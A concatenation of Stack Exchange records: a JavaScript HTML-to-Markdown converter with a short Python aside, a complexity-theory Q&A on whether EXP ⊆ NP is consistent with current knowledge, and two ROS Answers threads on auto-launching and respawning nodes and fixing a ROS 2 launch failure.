DIV.innerHTML = html + ''; for(var tag in conversions) { var elements = Array.prototype.slice.call(DIV.getElementsByTagName(tag.toLowerCase())); var length = elements.length; for(var i = 0; i < length; i++) { var element = elements[i]; if(element.childNodes.length > 1) { element.innerHTML = toMarkdown(element.innerHTML); } element.parentNode.replaceChild( document.createTextNode(conversions[tag](element)), element ); } } return DIV.innerHTML; }; window.MarkdownConverter = { addParser: function(tag, fn){ if( !this.hasParser(tag) ) { conversions[(tag + '').toUpperCase()] = fn; return true; } return false; }, hasParser: function(tag){ tag = (tag + '').toUpperCase(); return (tag in conversions); }, fromHTML: function(html){ return toMarkdown(html + ''); } }; })(Function('return this')()); It exposes a very basic API. The idea is to be as close as I can to the reference. You can read about it here: https://stackoverflow.com/editing-help Some mistakes in the matching were fixed. Also, the original version was limited to 1 level only, which means that things like <p>A <b>bold</b></p> wouldn't produce the right markdown. To fix that, I've added recursion. Also, the <blockquote> only had the markdown on the first line. All those issues and many others (that I don't remember) were fixed. Another addition was the support for the start attribute (it was deprecated on HTML4.01, but it isn't on HTML5) on ordered lists. Example of the markdown: (function(window, undefined){ 'use strict'; var TEXT_PROPERTY = document.head.innerText ?
'innerText' : 'textContent'; var NEWLINE = '\r\n'; var indent = function(text){ return text.replace(/(\r\n|\r|\n)/g,'$1 '); }; var conversions = { BR: function(){ return ' ' + NEWLINE; }, P: function(elem) { return NEWLINE + NEWLINE + elem.innerHTML + NEWLINE; }, H1: function(elem) { return '# ' + elem.innerHTML + NEWLINE; }, H2: function(elem) { return '## ' + elem.innerHTML + NEWLINE; }, H3: function(elem) { return '### ' + elem.innerHTML + NEWLINE; }, HR: function() { //we use 4 to do not cause confusion with <strike></strike> return '----' + NEWLINE; }, BLOCKQUOTE: function(elem) { return '> ' + elem .innerHTML .replace( /(\r\n|\r|\n)/g, '$1> ' ); }, IMG: function(elem) { return '![alt text](' + elem.src + ')'; }, A: function(elem) { return '[' + elem.innerHTML + '](' + elem.href + ')'; }, UL: function(elem) { var li = elem.children; var length = li.length; var md = ''; for (var i = 0; i < length; i++) { md += ' - ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, OL: function(elem) { var li = elem.children; var length = li.length; var md = ''; var start = elem.start|0; for (var i = 0; i < length; i++) { md += (i + start) + '. ' + indent(li[i].innerHTML) + NEWLINE; } return md; }, B: function(elem) { return '**' + elem.innerHTML + '**'; }, STRONG: function(elem) { return this.B(elem); }, STRIKE: function(elem) { return '---' + elem.innerHTML + '---'; }, DEL: function(elem) { return this.STRIKE(elem); }, I: function(elem) { return '*' + elem.innerHTML + '*'; }, PRE: function(elem){ return indent(this.innerHTML) + NEWLINE; }, CODE: function(elem){ if(elem.parentNode.tagName != 'PRE') { return '``' + elem.innerHTML.replace(/\r|\n/g,'').replace(/^\s*(.*)\s*$/,'$1') + '``'; } else { this.PRE(elem); } } }; var toMarkdown = function(html){ var DIV = document.createElement('div'); //will have the HTML to parse. 
DIV.innerHTML = html + ''; for(var tag in conversions) { var elements = Array.prototype.slice.call(DIV.getElementsByTagName(tag.toLowerCase())); var length = elements.length; for(var i = 0; i < length; i++) { var element = elements[i]; if(element.childNodes.length > 1) { element.innerHTML = toMarkdown(element.innerHTML); } element.parentNode.replaceChild( document.createTextNode(conversions[tag](element)), element ); } } return DIV.innerHTML; }; window.MarkdownConverter = { addParser: function(tag, fn){ if( !this.hasParser(tag) ) { conversions[(tag + '').toUpperCase()] = fn; return true; } return false; }, hasParser: function(tag){ tag = (tag + '').toUpperCase(); return (tag in conversions); }, fromHTML: function(html){ return toMarkdown(html + ''); } }; })(Function('return this')()); document.body.innerHTML= '<pre>' + MarkdownConverter .fromHTML( document .getElementById('html') .innerHTML ) .replace(/</g,'&lt;') .replace(/>/g,'&gt;') + '</pre>'; <div id="html"> <p>Te<i><b>s</b></i>t</p> <h1>h1</h1> <br> <h2>h2</h2> <br> <h3>h3</h3> <br>text outside everything <br> <h2>(and another element!)</h2> <br> <img src='http://example.com/example.png'> <br><a href='http://google.com'>a link!</a> <br> <ul> <li>item 1</li> <li>item 2</li> <li>item 3</li> </ul> <br> <ol start="2"> <li>item 1</li> <li>item 2</li> <li>item <b>3</b></li> </ol> <br><strong>BOLD TEXT</strong> and <i>ITALICISED TEXT</i> <br> <blockquote>blockquote</blockquote> <br> </div>
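As a closing aside (not part of either answer above), the innermost-first strategy ports easily to other languages. Here is a minimal Python sketch using only the standard library; it handles just a few simple tags and ignores all the list/blockquote/entity subtleties discussed above, so treat it as an illustration of the recursion idea, not a full converter:

```python
from html.parser import HTMLParser

# Per-tag (prefix, suffix) wrappers; the converted inner text is spliced between them.
WRAP = {
    "h1": ("# ", "\n"), "h2": ("## ", "\n"), "h3": ("### ", "\n"),
    "b": ("**", "**"), "strong": ("**", "**"),
    "i": ("*", "*"), "em": ("*", "*"),
}

class ToMarkdown(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = [""]   # stack of output buffers, one per open wrapped tag
        self.tags = []    # stack of currently open wrapped tags

    def handle_starttag(self, tag, attrs):
        if tag == "br":
            self.out[-1] += "\n"
        elif tag in WRAP:
            self.tags.append(tag)
            self.out.append("")  # start collecting this tag's inner text

    def handle_endtag(self, tag):
        # Only close a tag that matches the top of the stack; mismatched
        # or unopened closing tags are silently ignored in this sketch.
        if self.tags and self.tags[-1] == tag:
            self.tags.pop()
            inner = self.out.pop()
            pre, post = WRAP[tag]
            self.out[-1] += pre + inner + post

    def handle_data(self, data):
        self.out[-1] += data

def to_markdown(html):
    p = ToMarkdown()
    p.feed(html)
    return p.out[0]
```

Because each closing tag wraps the already-converted inner buffer, nesting comes for free: to_markdown("<h1>Te<i><b>s</b></i>t</h1>") returns "# Te***s***t\n".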
{ "domain": "codereview.stackexchange", "id": 15463, "tags": "javascript, converting, markdown" }
Given the current knowledge about complexity class, what can we say?
Question: I am a CS student. I am looking at some questions my professor wrote and I got stuck on this one. "Which one of the following inclusions between complexity classes is coherent with the current knowledge? (even if not proved, yet)". The possible answers are: P $\subseteq$ EXP (which I know is true) NP $\subseteq$ EXP (which I know is also true) EXP $\subseteq$ P (which is clearly false) EXP $\subseteq$ NP Now, if I flag as correct only the two answers I know are true, I am told that my answer is only partially correct. So in conclusion my question is: given the current knowledge, can we say that EXP $\subseteq$ NP, or is this just a mistake by my professor? Thank you for your answers! Answer: Notice that the question is not asking for inclusions that are known to be true, but instead just for those that could conceivably be true given the current knowledge. In other words, you need to select both the relations that are already known to be true and the relations whose status is still unknown. The inclusion $\mathsf{EXP} \subseteq \mathsf{NP}$ is not disproven since, from what we know so far, it could be the case that $\mathsf{EXP} = \mathsf{NP}$. Therefore the last option should also be marked.
{ "domain": "cs.stackexchange", "id": 20225, "tags": "complexity-theory, time-complexity, np, complexity-classes" }
How to auto deploy a robot?
Question: Hey, I want to know how the robot can be configured to start on bootup. There are a handful of scripts which I want running in a proper order: roscore node that accepts cmd_vel and publishes tf freenect node node that launches the description of the robot (ie URDF) node that launches the navigation related modules nodes that pertain to IMU data How do I run all of the above nodes at startup, and how do I make sure that if any of them fails, it will be rerun? UPDATE I have added the respawn param and set it to true for the rosserial_python node; it still doesn't recover when crashing. Originally posted by chrissunny94 on ROS Answers with karma: 142 on 2018-03-06 Post score: 0 Original comments Comment by jayess on 2018-03-07: Please don't use screenshots for text. Images are not searchable, you can't copy and paste them, and you can't search them. Please update your question with a copy and paste of the error instead using the preformatted text (101010) button. Comment by Humpelstilzchen on 2018-03-07: I think the rosserial_python/respawn problem should be handled in a separate question. It also needs more information, your image doesn't really show a crashing node, just a communication problem Answer: You can do a roslaunch to run all of these nodes and start the launch file with a script, for example. Moreover, if a node fails you can launch it again by setting the attribute respawn of the tag <node> to true like this: <node name="listener1" pkg="rospy_tutorials" type="listener.py" args="--test" respawn="true" /> That will restart your node until it runs properly. Check here to see all the attributes of the tag, some might help you! Originally posted by Delb with karma: 3907 on 2018-03-06 This answer was ACCEPTED on the original site Post score: 2 Original comments Comment by chrissunny94 on 2018-03-07: How do i add respawn for freenect?
<include file="$(find freenect_launch)/launch/freenect.launch" /> we cant add a respawn parameter when we include other launch files . Comment by Delb on 2018-03-07: Copy the content of the freenect.launch into your own launch file and add the respawn attribute to the desired nodes (don't modify the freenect.launch it's not recommended at all to modify from source)
{ "domain": "robotics.stackexchange", "id": 30218, "tags": "ros-kinetic" }
ros2 launch fails after following some tutorials
Question: ros2 launch turtlebot3_cartographer cartographer.launch.py works fine. colcon_cd PACKAGENAME to ~/dev_ws/src/PACKAGENAME works fine. colcon build --packages-select PACKAGENAME works fine in ~/dev_ws. I have this in ~/.bashrc: export _colcon_cd_root=~/dev_ws export ROS_DOMAIN_ID=1 export ROS_PYTHON_VERSION=3 export ROS_VERSION=ros-foxy export LC_NUMERIC="en_US.UTF-8" source /opt/ros/foxy/setup.bash source /usr/share/colcon_cd/function/colcon_cd.sh What should I check to find out why ros2 launch PACKAGENAME.launch.py fails? Originally posted by vKuehn on ROS Answers with karma: 116 on 2022-04-14 Post score: 0 Answer: Solved: a package install was missing for one of mine under ~/dev_ws/src. After installing that, ros2 launch works fine. Very odd, as the missing PACKAGENAME was the one I had created. Originally posted by vKuehn with karma: 116 on 2022-04-14 This answer was ACCEPTED on the original site Post score: 0 Original comments Comment by ljaniec on 2022-04-14: How did you create this package? Maybe you missed a step in its configuration Comment by vKuehn on 2022-04-15: @ljaniec that is very probably the case. But how to fix such a problem? I would have hoped for some hint during the start or a log to look at... Comment by ljaniec on 2022-04-15: I think rosdep should help you here with additional dependencies in your workspace Comment by vKuehn on 2022-04-15: that's the ros1 documentation. but thanks for the hint Comment by ljaniec on 2022-04-15: Rosdep is used with ROS2 too: https://docs.ros.org/en/galactic/Installation/Ubuntu-Development-Setup.html#install-dependencies-using-rosdep, https://docs.ros.org/en/galactic/How-To-Guides/Building-a-Custom-Debian-Package.html?highlight=rosdep, https://answers.ros.org/question/310728/rosdep-and-ros2/ Comment by vKuehn on 2022-04-18: thanks for that and for keeping answering
{ "domain": "robotics.stackexchange", "id": 37577, "tags": "ros2, roslaunch" }